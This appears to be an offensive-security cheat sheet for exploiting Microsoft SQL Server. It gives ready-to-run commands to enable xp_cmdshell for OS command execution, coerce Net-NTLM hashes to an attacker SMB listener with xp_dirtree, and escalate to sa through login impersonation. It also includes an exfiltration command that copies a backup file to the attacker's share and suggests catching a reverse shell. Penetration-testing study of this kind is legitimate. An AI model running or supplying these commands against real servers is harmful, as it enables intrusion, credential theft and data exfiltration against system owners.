MSSQL (1433)
enumerationports
Summary
Connect with impacket-mssqlclient, then go for xp_cmdshell (code exec), xp_dirtree (hash coercion), or EXECUTE AS to impersonate a privileged login.
Walkthrough
MSSQL (port 1433) is one of the richest services on Windows targets.
Three things to try
- xp_cmdshell → code exec — enable advanced options +
xp_cmdshell, then
run OS commands. From there download a reverse shell and catch it.
- xp_dirtree → hash coercion — point the server at your SMB listener
(impacket-smbserver share . -smb2support) to capture the SQL service account's Net-NTLM hash, then crack or relay it.
- EXECUTE AS → privilege jump — if your login has
IMPERSONATEon a
higher-priv login (or db_owner on a trustworthy DB), impersonate it; chain impersonations up to sa.
Exfil example
With xp_cmdshell you can copy files to your SMB share: `` EXEC xp_cmdshell 'copy C:\inetpub\wwwroot\backup.zip \\<KALI_IP>\share\backup.zip'; ``
> sa (or any sysadmin) + xp_cmdshell is effectively SYSTEM on the box.
Commands
bash
# Connect (SQL auth, or add -windows-auth for integrated) impacket-mssqlclient <TARGET>/<USER>:<PASS>@<IP> impacket-mssqlclient <TARGET>/<USER>:<PASS>@<IP> -windows-auth
other
# Enable and use xp_cmdshell for command execution EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami';
other
# Coerce a Net-NTLM hash to your SMB listener (then relay or crack) EXEC xp_dirtree '\\<KALI_IP>\share',1,1;
other
# Impersonate a more privileged login if you have IMPERSONATE rights SELECT distinct b.name FROM sys.server_permissions a JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; EXECUTE AS LOGIN = '<TARGET_LOGIN>';